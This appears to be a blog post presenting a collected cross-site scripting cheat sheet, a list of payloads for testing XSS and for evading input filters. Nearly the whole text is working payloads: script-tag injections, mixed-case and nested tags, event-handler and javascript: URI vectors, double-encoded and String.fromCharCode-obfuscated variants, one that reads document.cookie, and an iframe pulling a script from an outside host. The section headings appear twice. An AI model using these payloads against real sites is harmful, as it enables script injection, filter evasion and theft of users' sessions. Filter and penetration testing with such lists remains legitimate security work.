Complete Cross site Scripting(XSS) cheat sheets : Part 1
I am just providing this XSS Cheat sheet after collecting the exploit-codes from hackers' techniques and different sites especially http://ha.ckers.org/xss.html . This is complete list of XSS cheat codes which will help you to test xss vulnerabilities ,useful for bypassing the filters. If you have any different cheat codes , please send your code.
Basic XSS codes:
----------------------------------
When inside Script tag:
---------------------------------
Bypassing with toggle case:
--------------------------------------
XSS in Image and HTML tags:
---------------------------------------------
Bypass the script tag filtering:
--------------------------------------------------
Using String.fromCharCode function:
-----------------------------------------------------
You can combine the above mentioned codes and make your own cheat code.
Note:
We are extending the cheat sheet. Soon we will publish the part 2.
Basic XSS codes:
----------------------------------
<script>alert("XSS")</script>
<script>alert("XSS");</script>
<script>alert('XSS')</script>
"><script>alert("XSS")</script>
<script>alert(/XSS")</script>
<script>alert(/XSS/)</script>
When inside Script tag:
---------------------------------
</script><script>alert(1)</script>
‘; alert(1);
')alert(1);//
Bypassing with toggle case:
--------------------------------------
<ScRiPt>alert(1)</sCriPt>
<IMG SRC=jAVasCrIPt:alert('XSS')>
XSS in Image and HTML tags:
---------------------------------------------
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=javascript:alert('XSS')>
<img src=xss onerror=alert(1)>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC="jav	ascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<BODY BACKGROUND="javascript:alert('XSS')">
<BODY ONLOAD=alert('XSS')>
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<IMG SRC="javascript:alert('XSS')"
<iframe src=http://ha.ckers.org/scriptlet.html <
Bypass the script tag filtering:
--------------------------------------------------
<<SCRIPT>alert("XSS");//<</SCRIPT>
%253cscript%253ealert(1)%253c/script%253e
"><s"%2b"cript>alert(document.cookie)</script>
foo<script>alert(1)</script>
<scr<script>ipt>alert(1)</scr</script>ipt>
Using String.fromCharCode function:
-----------------------------------------------------
<SCRIPT>String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)</SCRIPT>
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
You can combine the above mentioned codes and make your own cheat code.
Note:
We are extending the cheat sheet. Soon we will publish the part 2.
Comments